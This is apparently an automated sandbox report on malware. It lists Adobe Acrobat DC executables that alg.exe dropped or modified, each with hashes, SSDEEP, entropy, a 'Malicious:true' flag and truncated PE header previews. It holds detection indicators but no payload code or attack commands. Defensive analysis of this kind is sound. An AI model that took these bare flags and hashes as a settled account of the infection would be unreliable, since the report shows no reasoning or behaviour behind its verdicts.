                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................?r.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.281834707414892
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Eg5FvCPusysqjnhMgeiCl7G0nehbGZpbD:hftxDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2585585FCE8B8E4B22832B50E9868F49
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D1D503E641642308EA04CA1B5DE87A0F49E4D359
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5D856003C0A06C33EBB38FC7AE5A938B73FAF8B8EB52C726820B6CCCDBAEF95C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8C8CB60BB370430B01CBCEB2DC35598A381A9C3B230FAD0CEE6C976F1354BA7CC25FB37A5660E6FBD0A149A1A7A4676793D77669F9FB669C7A16CD947BBB09B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......KZ.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.208909582001205
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hjKTIsAjFuvtIfmFthMaT5U8aChaeuQsqjnhMgeiCl7G0nehbGZpbD:hjIMmPh7TT79ZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF81EED04B3A66304AD531FFC1867B7D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2779C4E831938CB76AD5397104B38F1A03B719E5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CB29DCFD7E9D0B9CBD56A90AC8963513F32BF64D67EFAC1BD4B2655A93C9BDD4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AF8D932C9D8F9FEE99831B1B0D82C63D24A93C5D0D4836C484C58EC9DF3AFF3A2D85006386B275841A3FBDD5E7A63E277CA58BA049ED65D43CBDFDA28F61F6E0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.411794882683001
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:CGqVwCto1Gm5WgssqjnhMgeiCl7G0nehbGZpbD:/Z1GmUHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD69CCD4259592BCA4D9192D0D777774
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AADD87904D9AFC19010576FA3F1A9801B1193116
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C870837B4D231C0875BF818D43F2FE1161EA46BA5025A16CE35FB54B202C45E8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:24D77DC821998A271ECAB852A22EFFFB1AE11970AC9C274EE27E6D04320DB80FF322BB5ED656255E5ECF460D1E451BB050A7985C9C2597AFCAF115903BEE1D1F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.157423585400857
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:oWBWwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oWBWwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:85516169E119F171AF91A38331A68A63
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E7138730FB1F8F09D4069A7D1C5528FDFD089C61
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0A9BC487BFE66F97C10772CADAE124B12D5B388A5D5B660ECE8CAAA4757FA827
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:372C3204F6979C7A3A6812475966A67C8182C1BF70D1D2395D04C55BBDD03BFD4EB94FCB2A98304C4B9A62E7DD176D22B35F81AF41A8CE8A22B5A637836B425F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.228501900361032
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Wf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0HsqjnhMgeiCl7G0nehbGZpbD:W+GtCi27mVTyT+a0bDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C25EA7E5D8AEF4DD7417B5CEA6122D4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC2B198FBEF8B435B03D1C01E3010F3EEC18313C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DA879D91587CB89C4AB6AD76C4DD4B7148809C542B51025E62DE1B1BC7561892
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7FB88CB9456C1E6A940F252B58CBACD513FE5D00F2B2CBBEF35F97D7BC1BB51F2FA67AD6B5D7BD5A0D4A74A36CBF53D9190538CFCE8F479C21C2508EE54877F4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.649676533852281
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:/U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYgDmg27RnWGj:A2NfHOIK5Ns6qR9CD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A56896746DDBDA091454AD14E2ED5EC4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E44DF73FEC414C0CA83612E62F8A96285737704D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:18F31BF52DCCCA5953E0801918448130117E6CD5A9002DD3D01D8F265520AFB1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9735FF13A78A57C589D85DA2E9109C55D982ECD8835AFC695E0129B47C46477D6E2AE9C4D2D5BF8CFF4D8FBFD41F45D505B670DBC73D9D24A90351B7880691F2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.531934242175906
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:UkcWTUQcyd8sqjnhMgeiCl7G0nehbGZpbD:UhKUzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FC6BB4699BFDD25B3068DB2DA337480A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BB6BE5449452414A00F03D165980811E93BAF097
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:76D7EEA1B89EE689026D9E36D425E78CB058DF1B7520DCC6E21C81E99B673014
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6F2E15DBE8E09F9C5E3707AE1C42C749FF057AA5A515A384E5F435495057BF19CC111BD5E174E1674135EBC40F4A7A358AA97944D43DBFA541BD80C6EF21017E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................mK.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3526757305365615
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:9fY+FUB3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9A+qB3sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0F3DF3406825E1F349F9B437190B58BB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:004D24D95CD213D29F691A6E470E2ADA88488815
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5EC9BBD3683FC301A9B6CCF09BAC5554EE506BBED0D49ABCA20F4A0F7788F823
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EE7BD249BFD46E8EF1A59D73A79B71531EF21E9B782B1F82F5EB912AE7F7765938693AD4CB5EA3400E6837D1BE0354B72DD64113ADE1E3249DE5A228F8F220F1
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................L..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.022684095191562
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6500E0818F35E36CC2DED44BF8C5DA67
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B3A431172D34F5EDB081BFB5AFFE8C5971E5768F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AB1B1AC20A5C945C47B28B1AA404A5F7AFBDFAC116B2460F621AB502C1179445
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:506C9F8A4607FC16EF7173ECEAD9B217D5BFDA5433A10B249207F1C41758DEC4F06EAE02894663D4C6A3BA352631E6AD6ED0B79B05F0A46BC69E646E3B3D2E7B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................?..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.04716127114129
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:0zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B2D6729DBB29C0C3D734DEBA449B7C53
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E821E8B587BE29D0BB6FFC783AAFD9FEEAA7CFF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:32988EE72D6A445BF98A31DA7FD003C9A44D99789FA17A5B5E5DF2B5E02A710C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:15422552584E2308AAA982A226A5F9FD1F886C90B1090D21C0D43FC69E25CCD11999F3A6288FA68598E884BB7238C9EBB5FEE37E6168BFCE2AF34468778EC3B6
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.499790901140937
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:JtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7552Dmg27RN:JjEIa4HIEWOc5AD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CD58D6EB2834D4915AD7C9BEE48C599A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0679B1C373384715947F0D32146B515A91B2B8D6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F8F91DC8EA820B7A41ECE63997E7387A47A50D7BC57A6D5D509569DD75072FA8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C5B085A15CEE92C557F152072EE9F6273AE8073F453AFFEB6C73FD3CC464C245C618259A326D52B3CBA14036460CEC2999C753B96584331A6CCC4F169AAD052
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....;$@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9993673286531735
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:+Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:9XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BE4863D85D6970CEE76B7D4143E01CDF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3AA739E1AD1AF9ED4E22CEA5532597F29F960B3E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AE110834FBAE1D695582A6578C690C72503C7B8566BCB2FEBBFC8BA033ACFFA5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F69FF31A9CD44873F87A3A89F27824ED35777E39C5365027642EC6633E523F954A6296D34CEDECA3D4EA0CD7DB6F1CDA9D5913014436008C7B820743AC38D1E5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......>.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.185612995329464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SejVWYUAzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vjkY7zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:13E3443C87D3AFF59C40791D203A3417
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A9193B3A23A956CB87054B5E7F64AD85010F9D6C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E9E7C7945712182109D2D0592E3D5ADA6EA768497657FBB5605AF65D2DF6E48F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7B50BE26D3DAE2E05D35C65C1B91D8E4FA2D7554906FD1B1B6319C6C41AEE18A027DBB8DA60035419F35BA2AC46C654EDEBE8B567189E0B4A144A5F6BFAE9F60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
